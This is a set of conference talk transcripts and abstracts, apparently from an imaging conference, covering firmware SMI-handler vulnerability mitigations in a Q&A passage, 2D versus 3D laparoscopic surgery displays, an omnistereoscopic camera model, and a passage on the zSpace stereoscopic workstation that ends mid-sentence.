other than when the OS boots. This is a PCI architectural capability, so that any operating system can relocate the ranges, because devices may be added, they have ranges, and the OS should be able to relocate all the ranges. So I don't think there is a generic way to know whether a relocation of the ranges is legal or not. Again, in a virtualized environment you can prevent it at runtime. Actually, the latest mitigation that you showed on your laptop, you showed that the MMIO BAR register has been restored. Right. And what I was wondering is, in that case, you can't do the same thing for every SMI handler, because maybe someone needs to relocate it legitimately. Oh, okay. Yeah, I get it. So you cannot do the same mitigation for all the SMI handlers, that's your question. I think you're correct that it's not a very generic mitigation, and that's why there are three options that the firmware should consider, and a combination of those three options should be implemented, I think. But it also works if you know... because the SMI handlers shouldn't be installed at runtime, they should be fixed. So you know where each SMI handler is, which device it's communicating with, which MMIO range it's writing to or reading from, and in that case it might be a relatively generic mitigation, because you know that in advance. But yeah, I think it's a combination of the three options that should be there. Yes, that's exactly the question. Thank you. Thanks.
I actually had a suggestion, maybe, for a possible additional mitigation for some devices that should not normally be relocated by the OS, like the same SPI controller: maybe the firmware could just store the BAR and not read it from the device each time. Yeah, except when you store the BAR, the cached value... let's say the OS or exploit code relocates it; you're still writing to your original value, because you cached it and you're not using it, not reading it from the device. But then you're not really talking to the device, right? I see. Yeah, the functionality is broken, but you don't care, because this is an attack. The trouble is it's more than the functionality being broken: the exploit code might force you to read and write the cached location, which now might be used by something else. So there's a potential for an issue there. That's why option three is more of a "you do cache it beforehand, when the firmware boots, but you also force this default location into the actual registers", so you know that you're actually talking to the device as well. All right, I think that's time for the next presenter. Thank you.
|
Previously, we discovered a number of vulnerabilities in UEFI based firmware including software vulnerabilities in SMI handlers that could lead to SMM code execution, attacks on hypervisors like Xen, Hyper-V and bypassing modern security protections in Windows 10 such as Virtual Secure Mode with Credential and Device Guard. These issues led to changes in the way OS communicates with SMM on UEFI based systems and new Windows SMM Security Mitigations ACPI Table (WSMT). This research describes an entirely new class of vulnerabilities affecting SMI handlers on systems with Coreboot and UEFI based firmware. These issues are caused by incorrect trust assumptions between the firmware and underlying hardware which makes them applicable to any type of system firmware. We will describe impact and various mitigation techniques. We will also release a module for open source CHIPSEC framework to automatically detect this type of issues on a running system.
|
10.5446/32358 (DOI)
|
Okay, my talk is about something different from what you heard in that session. I will talk about an evaluation of 2D and 3D imaging systems for laparoscopic surgery from the user perspective. The research has been undertaken by two groups in Germany: one group of medical experts from the University Hospital in Munich, and one group of human factors engineering experts from the Fraunhofer Heinrich Hertz Institute in Berlin. As John said, I'm the one from Fraunhofer. Okay, let's start. 3D imaging systems for laparoscopic surgery have been around for more than two decades, and there's a large body of research showing that it's beneficial to use stereoscopic imaging in surgery: you get better results, it's better for the patients, better for the surgeons. Nevertheless, these systems have never quite made it into the operating rooms, probably because of the vision and eye problems that have been reported with early systems. The visual discomfort was always a big topic, and there might have been other reasons for these systems not to penetrate into practice. Another thing is that you sometimes read that only novices profit from 3D imaging, so there's a myth that once you're an experienced surgeon you don't need your eyes anymore, your hands know everything you need to know. That might prevent some people from buying such equipment for the operating room. But now we have new products on the market, 2D and 3D products, and of course always new products in the labs, and that was a reason to re-evaluate the myths I mentioned, and other things, like whether the eye problems are still there. In detail, our questions are the following. The first is: can we reconfirm that stereo is beneficial in minimally invasive surgery like laparoscopy, which we expect on a theoretical basis, but of course with every new investigation you have to recheck that. Then we have a rather odd question: as 3D systems are improving, is there an asymptote, what is the asymptote, how good can you get? We try to answer that question with our research, and also how far away we are from that asymptote. We wanted to see whether we can bust the myth that stereo is nothing for experienced surgeons, and last not least, it was interesting whether all these claims about visual discomfort from using 3D systems are still valid. What we did was, of course, an experimental investigation. We composed four different imaging systems which we then compared, partly consisting of commercial components. First, an autostereoscopic display, a prototype produced in my institute, driven by a 3D endoscope from the Storz company in Germany. The next system was a 3D display from Sony combined with the same stereo endoscope from Storz. Then we had a 2D system provided by Storz, 2D monitor and 2D endoscope, and, the one I will explain in a minute, a mirror display that has no electronic transmission, which we constructed as a kind of gold standard for benchmarking 3D systems in the future. Also a short look at the autostereoscopic system from our lab. As you see, it's a portrait-type display; the reasons for that I can explain in a coffee break. It has a head tracker: we have stereo cameras here that track the user and find his eyes, and the information about the spatial position of the eyes is used to adjust the lenticular lens plate using voice coil motors.
The lens plate can be shifted left and right and forward and backward to make sure that the viewer's eyes are always in the sweet spot of the autostereoscopic system. That's the mirror display we constructed. Let me briefly explain it. We have one mirror here onto which the surgeon is looking, and it's in the same position as where you would place your ordinary LCD panel based monitor. But this mirror just mirrors the image of another mirror positioned here, and that mirror looks at the surgical target here. Altogether the setup looks like that. In terms of the physical arrangement it's similar to the usual operating situation in laparoscopic surgery. To have the same size, or approximately the same size, images as on the electronic displays we introduced a magnifying lens here. You can see that it's a Fresnel-type lens, and it served also as a pivot for the instruments of the surgeons. We drilled little holes in there and the instruments were poked through the holes in the Fresnel lens plate. The task our subjects had to perform was to make a simulated suture on a kind of dissected gut that has to be reconnected. Here you see how it is done. We have two layers of tissue here, one dissected one that has to be reconnected with the suture. We have another layer of tissue down there, and it's important first to hit the marks correctly, so to place the needle right in the middle of the marks, and it's also important not to hurt the underlying tissue here, so like in reality. You see that weaving motion here that comes from 2D imaging, because the surgeon doesn't know how far he is away from the target, and that goes on and on, and the task stops when you have penetrated here. So it's a continuous suture. That little thing here is called a knot bench. I've brought one here if you want to inspect it later. That was the setup in the lab. On the left you see the mirror display, on the right you see the other imaging systems: the 2D display, the glasses-based 3D display that the female surgeon is just using, and the autostereoscopic display here. So all comparable setups, same lighting conditions; we tried to adjust the brightness levels of the displays as well as possible. The test subjects were divided into two groups. We had 48 surgeons altogether, 24 novices and 24 experienced surgeons. The criterion was the number of laparoscopic operations previously performed. Experts had on average about 800 operations and the novices, the beginners, less than 100. The test was for everybody to use all four systems, and they had to use them in a completely random order to average out learning effects. We did a lot of measurements during the task, objective and subjective measurements, and I guess that's the reason why we call the study comprehensive, not because we had so many systems under inspection but because of all the different types of measurements we made. The first ones are the objective measurements, performance measurements. Some examples are result quality, where we had a rating system for the quality of the suture, the path lengths that were used, how long it took, and some efficiency measures. On the subjective side we used the NASA task load index. We had the test subjects perform depth quality ratings using the RTO scale. We produced a visual discomfort questionnaire adapted after Okuyama, who presented that here at this conference in 1999.
Also a usability questionnaire was administered, and the subjects had to perform a preference ranking of all the systems. They had to say: I like that one best, that one second best, and so on. Now to some of the results concerning performance. As you see here, what we intended and expected is that people perform best with the mirror display, second best, also as expected, with the commercial 3D system here, less good with the 2D system and rather badly with the autostereoscopic display. If you look at the task times the picture is essentially the same, or complementary. The fastest performance was with the mirror display, the second fastest was the commercial 3D system with glasses, and worse than those two were the monoscopic system and the autostereoscopic system. We can skip that. The NASA task load index: I don't know if you're familiar with that, but it is a questionnaire with six items asking for subjective load, mental load, physical load and so on. You can get a maximum of 100 points, which means 100 points is a very demanding task, and zero points when you do nothing. You see here that the task was easy, because we are in the 40s here, which is something like talking to somebody, so you can't do very much with the task load index here. There are differences though. Again the autostereoscopic display was somewhat less easy than the other ones, and you have the typical order here, where the 3D display produces the smallest load, but the figures are so similar that I wouldn't say it makes any difference. The depth impression rating is very interesting. We have the best rating with the commercial 3D display, not so good with the mirror display, which hints at the fact that depth is somewhat exaggerated when using the combination of disparity and magnification in the endoscope and display combination. Of course you have bad depth rendering in the 2D display, and that needs no explanation. Again not so good with the autostereoscopic display. Visual discomfort, to say it briefly, is a non-issue nowadays. You could reach six points for very bad systems and we are around one with all the systems, so there is no visual discomfort anymore. Coming to the ranking, the first rank has been occupied by the commercial 3D system here. The picture is somewhat different if you compare the mean rank. On average people think that this system is as good as the 2D system, which needs discussion. My interpretation is that there is a conservative element there, that people stick with the proven technology somehow. To come to the conclusion, we can skip that, I have explained everything. I should say that there is no good reason not to use 3D imaging in the operating room nowadays. You can use the mature commercial systems. You have benefits for the patient and for the surgeon, and you have no problems, no eye and vision problems obviously. We hope that the autostereoscopic systems can catch up a bit in the future, because they currently obviously don't perform so well. We can discuss the reasons for that again later. When they become mature, they would obviously provide a usability advantage, because you don't need the glasses, and that's clearly better if the performance and other factors are equal to the glasses-based system. Of course, maybe you have seen that, otherwise I go back to the first slide again. You see that the benefits that novices and experienced surgeons have are the same.
Even if you are a well-experienced doctor, use a 3D system and you will perform even better. Thanks.
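As a rough illustration of the NASA task load index scoring used in this study, here is a minimal sketch in Python. The raw (unweighted) TLX score is simply the mean of six subscale ratings on a 0 to 100 scale; the example ratings below are made up and are not data from the study, and the weighted TLX variant with pairwise comparisons is not shown.

import statistics

# The six standard NASA-TLX subscales, each rated from 0 to 100.
SUBSCALES = ("mental_demand", "physical_demand", "temporal_demand",
             "performance", "effort", "frustration")

def raw_tlx(ratings: dict) -> float:
    """Raw (unweighted) TLX score: the mean of the six subscale ratings."""
    return statistics.mean(ratings[s] for s in SUBSCALES)

# Hypothetical participant after the suturing task (illustrative values only):
example = {"mental_demand": 55, "physical_demand": 45, "temporal_demand": 40,
           "performance": 30, "effort": 50, "frustration": 30}
print(raw_tlx(example))   # about 42, i.e. roughly the level reported in the talk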
|
Though theoretically superior, 3D video systems did not yet achieve a breakthrough in laparoscopic surgery. Furthermore, visual alterations, such as eye strain, diplopia and blur have been associated with the use of stereoscopic systems. Advancements in display and endoscope technology motivated a re-evaluation of such findings. A randomized study on 48 test subjects was conducted to investigate whether surgeons can benefit from using most current 3D visualization systems. Three different 3D systems, a glasses-based 3D monitor, an autostereoscopic display and a mirror-based theoretically ideal 3D display were compared to a state-of-the-art 2D HD system. The test subjects split into a novice and an expert surgeon group, with high experience in laparoscopic procedures. Each of them had to conduct a well comparable laparoscopic suturing task. Multiple performance parameters like task completion time and the precision of stitching were measured and compared. Electromagnetic tracking provided information on the instruments' path length, movement velocity and economy. The NASA task load index was used to assess the mental work load. Subjective ratings were added to assess usability, comfort and image quality of each display. Almost all performance parameters were superior for the 3D glasses-based display as compared to the 2D and the autostereoscopic one, but were often significantly exceeded by the mirror-based 3D display. Subjects performed the task on average 20% faster and with a higher precision. Work-load parameters did not show significant differences. Experienced and non-experienced laparoscopists profited equally from 3D. The 3D mirror system gave clear evidence for additional potential of 3D visualization systems with higher resolution and motion parallax presentation. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32360 (DOI)
|
I'm going to present now a kind of follow-up to the conclusion of my first presentation, for those that were here. I was talking about the review of the technology to produce stereoscopic panoramas for human viewing, with a particular twist of including dynamic scenes in the problem. In that case I concluded that, well, a multi-camera approach using a reduced number of stereoscopic samples, partially overlapped, could be mosaicked into a full omnistereoscopic image. And the mosaicking approach actually is an easy approach to do a frame-by-frame rendering and then enable omnistereoscopic videos. So there are two remaining problems in that case, and that was the follow-up that we started working on after doing this literature review of the technologies. One is how to mosaic these partially overlapped stereoscopic images while maintaining a consistent depth in between mosaics. Basically you don't want to see artifacts; if you see artifacts, that is a sign that there is something going on there. And as you see in the example I showed of that stereoscopic panorama, there are no noticeable artifacts, at least no very noticeable artifacts. There are still artifacts that are difficult to erase, but that was done with the prototype. So I decided to go into modeling this, how to model how much depth, how to maintain the depth illusion in between mosaics. And also another problem that is a regular problem in panoramic vision, at least in stereoscopic panoramas: how to deal with the vertical disparities, or at least how to explain where these vertical disparities came from and where you are expected to find those vertical disparities. So we propose a model, a very simple model to start with. And usually those models are the models that work, when they are simple and represent something meaningful or give some meaningful results. The model that I'm going to explain now is based on basically two cameras in a stereoscopic rig. And with that you can explain the majority of the technologies I explained in my first presentation based on horizontal stereo. And we have some experimental results based on simulations to test this model and to extract some conclusions. That basically is the roadmap of this presentation. Basically the model consists of these two pinhole cameras separated by a baseline. In the center we have the reference viewpoint of the panorama, and these two cameras could represent a rotated pair of cameras around that center. Or, with a certain displacement, it could represent the real case of a multi-camera system in which you cannot align or you cannot position these cameras all together, given the dimensions of the cameras and the nodal points. And, well, we have the reference frame for each one of the cameras, and a point in the scene could be projected into these two image planes. And using projective geometry and simple equations we can basically infer the horizontal disparity. We can calculate the vertical disparity for different configurations. And the different configurations are these. This simple model could be expressed in four forms. And we found that with those four forms, even though it's difficult to believe, we could represent most of the technologies I was talking about in the first presentation, but not those technologies based on vertical parallax. But I don't care about those technologies, because basically we were interested in the horizontal parallax problem.
So the first case is two cameras that could be rotated, or it could be a multi-camera approach; actually this is difficult to implement in the multi-camera configuration. The second one is basically shifting this and then rotating the cameras around the center; one of the papers from 1998 basically could be modeled with this configuration. The other configuration is displaced at this radial distance RC from the center, and that basically represents a multi-camera approach based on this stereoscopic rig, when you put multiple stereoscopic rigs around that virtual rotation center, the case in which the nodal points of these cameras cannot be in the center all the time. In this case, for example, you cannot implement this as a multi-camera approach, because all the cameras cannot coexist in space, co-located with the same nodal point. And the last case is basically this one rotated and shifted B over 2, B divided by 2, in the other direction. So basically you have this stereoscopic rig, where one configuration is centered on one of the cameras and the other is centered on the midpoint between the nodal points of the two cameras. These four configurations, for example, let's take this last configuration, configuration 4 that I was showing before: well, this represents a single rotating stereoscopic rig at that distance with respect to the center, a multiple-camera approach in which each one of the cameras has a certain spatial location with respect to the other stereoscopic rig, which is this multi-camera approach, or this multi-camera approach with a ring of n cameras rotated around the center or fixed around the center, all represented with the same model. To give an example, let's say that we have this model and we have two sequential acquisitions separated by an azimuth angle theta. So we have one stereoscopic pair and the other stereoscopic pair. Now let's say that in that configuration we decided to take six stereoscopic samples, numbered 0 to 5. We have six stereoscopic samples of the scene, partially overlapped, that constitute these two sequences of images, and this is the dataset we acquired. It could be sequential, it could be simultaneous. Now, when we start mosaicking this, we can differentiate different areas. We have an overlapping region here, where a point in the scene is visible by the two stereoscopic rigs, by two samples of the scene, and these areas that are visible by only one stereoscopic rig at a time. When we mosaic, we can define a fixed position to mosaic that depends on the number of stereoscopic samples. In this case, it's this position in between; this is the image, this is the reference center of the image and this is a position that is symmetrically located with respect to the center. Now, is that the optimal? No, it's not the optimal. It's a position reference that you can use: you have six stereoscopic samples and you have this width of the image, and then you can basically say by eye, well, this is the point where I have to stitch all the images in order to create the 360 degree view of the scene. But it's not the optimal point. We can see that. Those points that we saw before, well, P2 and P3 are the points that are visible only by one rig, in this case P2 by this stereoscopic rig and P3 by this one.
P4 is the one that is in the overlapping region of the two images, which I call the omnistereoscopic field of view of the whole arrangement. Now coming back to this model, any point of the scene can be represented in the reference frames of each one of the cameras by this equation, where R is the rotation. In this case, the two cameras are restricted to be in the XZ plane, and the theta sub i represent the azimuth sample angles between the two. Y is always parallel to the Y of the global reference frame. So basically the two cameras are restricted to one single plane, they have parallel axes, and basically they are rotated in this direction. So all the different positions can be represented by this single equation, and this translation represents the translation between left and right. From these relative coordinates of the scene point in each one of the cameras you can, using projective equations, find the coordinates in each one of the images, the x and y coordinates for the left and right, for each one of the theta sub i. Following that logic, you can talk about the horizontal disparity error, which is the difference in horizontal disparity that is going to exist in the overlapping region of the two images, or two stereoscopic pairs, that we need to mosaic. When that difference is larger than the threshold of human resolution of horizontal disparity, then it's going to be noticed. So if it's below what we can perceive, it's not going to be visible and we can stitch it safely. So we can infer the horizontal disparity expression from those previous equations, for any theta sub i and theta sub i plus 1. So for two consecutive samples; given the symmetry of the problem, we just need to study two consecutive samples. There are certain simplifications that can be done here: for example, the z, or the depth, with respect to one stereoscopic pair, the left or the right camera, is going to be the same. So we can reduce this to a single distance with respect to one single camera, and it's going to be different from the one that is seen by the other pair. And then, talking about the error, the absolute difference between these two magnitudes: when manipulating the equations you can reach something very simple, which is that the horizontal disparity error depends on the difference of the reciprocals of the depth as seen by each one of the stereoscopic pairs. Now translate that to each one of the four variations of the same model and then you can describe all you want, at least in terms of horizontal disparity. Now, what is the threshold of horizontal disparity in humans? That is a nice topic of research, because in some of the literature I found that, for example, this equation came out by comparing the same basic parallel-optical-axis stereoscopic pair model using pinhole cameras with the resolution of the human eye based on psychophysical studies, based on several tests on a certain group of humans with a certain selection of images, whether those images have certain texture or not, and that number changes. But when you put the two equations together, you can reach a horizontal threshold. This is the threshold in the horizontal disparity error that humans perceive, based on this pinhole stereoscopic pair and the human model, where the baseline is the distance between the human eyes.
So basically, if the baseline of this virtual stereoscopic rig is the same as the interocular distance in humans, you can simplify this. This parameter is the angular resolution perceived by humans, and that threshold is about 20 arc seconds, which is quite low, and this threshold gives something that is 25 times smaller than the width of a pixel. So basically it's of no use in this form: this is going to be lower than the width of a pixel for a regular camera, so you cannot use it. So we moved to using the width of a pixel as the threshold, which is a practical approach, given that the width of a pixel is basically what we need when we mosaic stereoscopic images. If the error is larger than the width of a pixel, it's going to be noticeable; if it's lower, it's not going to be noticeable. And it also happens that it maintains the continuity in the horizontal disparity. So if you consider something larger, 25 times larger, that 20 arc seconds becomes close to one arc minute of resolution. So we said that is probably the correct answer, given the technology we have today, and basically it looked good, so it must be correct. So we started simulating based on our model, using that threshold of one pixel, for a particular camera, using real numbers: the sensor width of a Canon 400D, an angular field of view based on a commercial fisheye lens that we could use in our experiments, a baseline of more or less half the interocular distance in the human population, 35 millimeters, and a radial distance for this particular configuration, 3 and 4, equal to the baseline, 35 millimeters. So we tried to compare the different cases and we came out with this plot: the minimum distance between the scene and the camera to have a continuous horizontal disparity. So basically what we are plotting here is the difference between the point we choose, x sub B, in the image, moving 5 percent towards the center of the image or minus 5 percent towards the edge of the image. And that correction gives us this plot: for example, if we are using that point chosen deterministically, we found that, for example, for configuration 3, the scene had to be 2 meters from the camera when you use 6 samples. When you use 8 samples, basically that overlapping region moves closer to the center of the stereoscopic pairs and that changes to a little bit closer to the camera. So, is that important? No, it's not that important, because basically, for practical reasons, if I build a camera and I want to determine whether one model is better than the other, or one configuration of multi-cameras is better than the other, based on this, I will say, well, I really don't care if the scene is 2 meters from the camera or 1 meter from the camera, unless we are talking about micro-omnistereoscopic images where things are very close to the camera and the scene is small. But in normal cases, if I put my camera here and I want to create an omnistereoscopic image where you guys are over there and me here and I am at 3 meters, well, I'm not going to have any problem if I choose that threshold to mosaic the images. But it has to have some use. Well, the use is basically the other thing that we're interested in: using this result to say we can define an optimal cut for the mosaics that is based on an energy function that considers this horizontal disparity resolution in humans.
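As a rough illustration of the relation just described, here is a minimal sketch in Python. It assumes a simple parallel-axis pinhole stereo model in which a point at depth Z has disparity f*b/Z, so the mosaicking error between two consecutive samples is f*b*|1/Z_i - 1/Z_next|; the focal length and pixel pitch below are illustrative stand-ins, not the exact values used in the simulations.

# Horizontal disparity of a point at depth Z for a parallel-axis pinhole
# stereo rig with baseline b and focal length f is d(Z) = f * b / Z, so the
# mosaicking error between two consecutive stereoscopic samples that see the
# same point at depths Z_i and Z_next is f * b * |1/Z_i - 1/Z_next|, i.e. it
# depends on the difference of the reciprocal depths.

def disparity_error(f, b, z_i, z_next):
    return f * b * abs(1.0 / z_i - 1.0 / z_next)

# One-pixel criterion: the seam is taken as unnoticeable if the error stays
# below the width of one pixel on the sensor.
f = 0.010        # 10 mm focal length (illustrative)
b = 0.035        # 35 mm baseline, roughly half the interocular distance
pixel = 5.7e-6   # 5.7 micrometre pixel pitch (illustrative)

for z in (0.5, 1.0, 2.0, 5.0):
    # suppose the neighbouring sample sees the same point 5 percent farther away
    err = disparity_error(f, b, z, 1.05 * z)
    verdict = "stitch OK" if err < pixel else "visible seam"
    print(f"Z = {z:3.1f} m: error = {err / pixel:4.2f} px ({verdict})")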
So when you introduce that into the algorithm of the optimal cut, the same scene could be cut in a different way when you mosaic, for elements that are closer to the camera and elements that are far away from the camera. You can find the point in between two mosaics where you can basically blend them and then make invisible any artifact that would otherwise happen if I used a fixed stitching point. And basically you can do this for each one of the models, or any configuration you can imagine. And that, well, that is an interesting result. Then there are vertical disparities. Vertical disparities in panoramas always appear. But based on this model, the vertical disparity within the stereoscopic pair of each camera should be zero, because based on this equation for the projection on the image plane, this value and this value of the distance to the scene are equal. For each stereoscopic pair we said that the z is equal for both cameras, so this value simplifies, basically if they are aligned. It happens that in reality this is never the case, because the optical axes are not really parallel and they are misaligned. So you have to do some correction, some stereoscopic registration. But if you do that, basically you wouldn't have any problem in these areas. But you will have problems in the overlapping areas. And that problem happens not between left and right, but within the left sequence of images and within the right sequence of images. And that happens when you do this comparison. You see that this expression that gives this number is a multiplicative factor over this y, where y is the elevation with respect to the center. When we are talking about the equatorial area here, it should be zero, so it's going to be aligned. But the more you look up or down, you will have a multiplicative factor that affects that, and the larger this part is going to be, the more you need to warp the images in order to make them aligned. But we are talking, again, about left with respect to left, and right with respect to right. And to see this graphically: you see that when the scene is far away from the camera, that effect doesn't matter, because basically that disparity is not going to be noticeable. But when you're taking a panorama here, imagine what happens with the ceiling or the floor that are closer to the camera, meaning a closer distance from the camera (this is the distance to the camera): the multiplicative factor is going to be larger. And that's why it always looks misaligned and you always have to do some kind of warping in that direction. I'm talking always about the case when I don't have extra information about the depth in order to match pixels. All right, and here you see what happens at different distances. So basically all this analysis was to put together a model that could represent all the different omnistereoscopic technologies with horizontal parallax, and it's flexible and simple enough to represent this. We came out with a result that can be used to derive an optimal cut, and we explained some issues that happen with vertical disparities. Well, that is my presentation and I hope you enjoyed it. Thank you.
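To make the vertical-disparity behaviour just described concrete, here is a minimal sketch in Python (NumPy), again under an idealized pinhole model with illustrative numbers: the same scene point, seen in two consecutive samples of the same (left or right) sequence taken around the panorama centre, projects to vertical coordinates y = f*Y/Z that differ because the depth Z along each optical axis differs, and the mismatch grows with the elevation Y and shrinks with the distance to the scene.

import numpy as np

f = 0.010   # focal length, metres (illustrative)
r = 0.035   # radial offset of the camera from the rotation centre (illustrative)

def vertical_coord(point, theta):
    """Vertical image coordinate of a world point for the sample at azimuth theta."""
    c, s = np.cos(theta), np.sin(theta)
    R = np.array([[c, 0, s], [0, 1, 0], [-s, 0, c]])   # camera looks along (sin t, 0, cos t)
    t = R @ np.array([0.0, 0.0, r])                    # camera position on the ring
    p = R.T @ (np.asarray(point) - t)                  # point in camera coordinates
    return f * p[1] / p[2]

theta_0, theta_1 = np.radians(0.0), np.radians(60.0)   # two consecutive samples
azimuth, elevation = np.radians(20.0), 0.3             # a point inside the overlap, above the equator
for dist in (0.5, 2.0, 5.0):
    P = (dist * np.sin(azimuth), elevation, dist * np.cos(azimuth))
    dy = abs(vertical_coord(P, theta_0) - vertical_coord(P, theta_1))
    print(f"distance {dist:3.1f} m: vertical mismatch on the sensor = {dy * 1e3:.3f} mm")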
|
CONTEXT: In recent years, the problem of acquiring omnidirectional stereoscopic imagery of dynamic scenes has gained commercial interest and, consequently, new techniques have been proposed to address this problem [1]. The goal of many of these novel panoramic methods is to provide practical solutions for acquiring real-time omnidirectional stereoscopic imagery suitable to stimulate binocular human stereopsis in any gazing direction [2][3]. In particular, methods based on the acquisition of partially overlapped stereoscopic snapshots of the scene are the most attractive for real-time omnistereoscopic capture [1]. However, there is a need to rigorously model these acquisition techniques in order to provide useful design constraints for the corresponding omnidirectional stereoscopic systems. OBJECTIVE: Our main goal in this work is to propose an omnidirectional camera model, which is sufficiently flexible to describe a variety of omnistereoscopic camera configurations. We have developed a projective camera model suitable to describe a range of omnistereoscopic camera configurations and usable to determine constraints relevant to the design of omnistereoscopic acquisition systems. In addition, we applied our camera model to estimate the system constraints for the rendering approach based on mosaicking partially overlapped stereoscopic snapshots of the scene. METHOD: First, we grouped the possible stereoscopic panoramic methods, suitable to produce horizontal stereo for human viewing in every azimuthal direction, into four camera configurations. Then, we propose an omnistereoscopic camera model based on projective geometry which is suitable for describing each of the four camera configurations. Finally, we applied this model to obtain expressions for the horizontal and vertical disparity errors encountered when creating a stereoscopic panorama by mosaicking partial stereoscopic snapshots of the scene. RESULTS: We simulated the parameters of interest using the proposed geometric model combined with a ray tracing approach for each camera model. From these simulations, we extracted conclusions that can be used in the design of omnistereoscopic cameras for the acquisition of dynamic scenes. One important parameter used to contrast different camera configurations is the minimum distance to the scene to provide a continuous perception of depth in any gazing direction after mosaicking partial stereoscopic views. The other important contribution is to characterize the vertical disparities that cause ghosting at the stitching boundaries between mosaics. In the simulation, we studied the effect of the field-of-view of the lenses, and the pixel size and dimension of the sensor in the design of the system. NOVELTY: The main contribution of this work is to provide a tractable method for analyzing multiple camera configurations intended for omnistereoscopic imaging. In addition, we estimated and compared the system constraints to attain a continuous depth perception in all azimuth directions. Also important for the rendering process, we characterized mathematically the vertical disparities that would affect the mosaicking process in each omnistereoscopic configuration. This work complements and extends our previous work in stereoscopic panoramas acquisition [1][2][3] by proposing a mathematical framework to contrast different omnistereoscopic image acquisition strategies.
|
10.5446/32361 (DOI)
|
So, good afternoon. It's a pleasure to be here. zSpace builds an interactive 3D virtual holographic workstation for a user that is really immersive. It's very realistic; it feels incredibly realistic. And I'm going to be describing the system today. Now, before we actually describe the system, I'd like to sort of set the context and explain: what does it mean when something is immersive? Certainly, you know, we're at a 3D display conference; the display itself is important, but there are many other factors which are really important that create a truly immersive experience. Now, what does immersive mean? The founder of zSpace is a cognitive scientist, and he likes to use this term, cognitive levers. What is a lever? I'm sure all of you guys have seen or heard this very famous quote from Archimedes: give me a place to stand and with a lever I can move the world. Meaning it's a very small thing that, when applied at the right place with the right amount, can move mountains. What's a cognitive lever? Cognitive levers are those things in our cognition and our perception that activate our brain. So, basically, if there's something really small that you catch, maybe in the periphery of your vision, or in your body or your hearing or something like that, it really triggers an aha moment. And that aha moment is when all the little gears line up in your head and you say, oh, I'm looking at something real. So, we believe that there are these levers in your brain that really trigger the spatial, the analytical, and the intuitive aspects of your brain. And some of these levers that we like to call cognitive levers are here. Certainly the second one we've been talking about all day: a really good 3D display, a stereoscopic display, will give you that sense of an immersive experience. Really great 3D graphics in applications; this is SD&A, of course, so applications have got to be part of it. Providing motion parallax: we've heard that a lot, whether it's horizontal motion parallax or vertical motion parallax or coming in and out. To have motion parallax, even without stereo, is incredibly powerful. Another cognitive lever. And I'm going to talk to you a little bit more about proprioception. This is a cognitive lever, which is how you know your body exists in space. I know that my right hand is here, my left hand is here, it is tilted in this direction. That's proprioception. And that is also an incredibly powerful cognitive lever. The thesis of our company is that if you engage a collection of these levers in the proper sequence with the proper mix, the user experience becomes very, very immersive. It becomes real. So that's the context of cognition and immersion. Now what is our system? The zSpace system consists of the following parts. First of all, there's a full color HD display, a stereoscopic display. Matched with that is a pair of very lightweight polarized glasses. And they're tracked; that's why it says tracking eyewear. How are they tracked? They're tracked by some tracking cameras that are built into the bezel. You can see a little bit of them there and there. Tracking cameras. In addition to that, as I mentioned about proprioception, manipulating with a user input is really important. And for that purpose, we provide a really unique stylus that allows you to interact with the virtual objects directly, shall we say.
And then finally, on top of that, we provide a very innovative software development platform on which you can build incredible applications. And I'll show you some examples of that later on. The combination of all of these triggers the user to say, oh my gosh, this looks real. This feels real. I'm looking around objects. I'm interacting with objects. And so I'll show you a little example of how people react to zSpace when they first play with it. What you're seeing is an augmented reality version of it; you can produce it in real time. But the person wearing the glasses sees everything in 3D. This shows that you can collaborate through a network of zSpace systems. You can interact with it with your 3D stylus. It looks so real, people are just shocked, like this. So how do we do that? So let me now describe the various components of the system. We'll start with the display. The display is a 24-inch display. It's custom built for us at zSpace. There is a TN display, there is a segmented backlight, and then in front of the TN display is a polarizer switch, a polarization switch. Let me briefly talk about the polarization switch. What is it? Well, it's a TN cell, just like the LCD is. If we subject the TN cell to a low voltage, it induces, after the quarter-wave plate, circularly polarized light. In this case, it's for the left view. And similarly, for another frame, we turn it to high voltage. It lets light go through the quarter-wave plate, and what we get is the other circularly polarized light. So counterclockwise versus clockwise. And one of them goes through the left lens and one of them goes through the right lens, like this. So then the left eye will only see the left image, because the circularly polarized light will go through the left lens and gets passed to the user. The right eye will see essentially nothing, because it's circularly polarized the wrong way. So it's just blank. And then similarly, when it's time for the right image to come in, one frame later, the right eye sees this image and the left eye sees essentially blank. And we just swap back and forth. So that's time sequential using passive polarized lenses. Now, one of the problems with using time sequential displays is the fact of progressive scanning: we display an image, let's say we display the left image a row at a time, starting from the top, and then we sequence down. And then we write the right image, a row at a time, starting at the top, and we go all the way down. So what kind of problem does that cause? Well, let's imagine you're looking at this point in time. What image is actually on the LCD? Well, on the bottom part, it's still the left image, because we haven't started writing the right image there. The right image, we start writing right here. So let's say we start writing right here, and at this point in time we've written this segment, maybe we've written this portion. So in this top half we're seeing the right data. However, on the bottom half, we're still seeing the left data. It's left over from the previous time and we haven't gotten around to writing it. So when you look at it at this instant in time, what are you going to see? You're going to see a mixture of left and right images. And once that's on there, you know, your brain sees it and you can't pull it apart anymore. So what do we do? Well, we have to hide it. We have to hide the fact that part of the image is for the right eye and part of the image is for the left eye. And we hide it by using a segmented backlight.
So here's what we do in our system. We segment the backlight into, it turns out, five segments, even though this picture only shows four. The left image is written one segment at a time. So it's written right here for the first portion of the frame. And at the same time, we know that it's going to take a certain amount of time, three or four milliseconds, before that image is stable. And the same thing happens with the polarization switch: we set the polarization switch for the left state. However, we hide it. We don't actually turn on the backlight until both the polarization switch and that segment have settled down, you know, after this amount of settling time. And at that point, we turn on the segmented backlight. We turn on the LED just for that burst. For the rest of the time, that LED is off, so you don't see anything. So we're hiding the mixture, shall we say, and we turn on the LED just at that little spot. And then we turn it off and then we write the right image, and similarly with the right polarization state. And then we turn on the LED right at the last minute and we pulse it. And we do that for all of the segments. So we actually just pulse it segment by segment, sequenced in time, so that we only see the correct image at the correct time for a brief moment. So that's how we deal with separating the left and right carefully and well, to minimize the effect of ghosting. So that's the display. Let's talk a little bit about the tracking itself. We need to track so that we know where the left and right eyes are, right? And the way we do it is we use optical tracking. And I'll just briefly tell you what we need to do. For tracking, we need to know, for the left and right eye, the position as well as the orientation, the yaw, pitch, and roll of whatever target we're tracking. Together, the position and the yaw, pitch, and roll give us six degrees of freedom that we have to track. And we use the very simple, conceptually simple, idea of triangulation. We have two cameras that look at a particular point out in space, let's say my left eye. And using a little bit of geometry, we know the distance D, and we know where that left eye is by measuring the angles alpha and beta; with a bit of 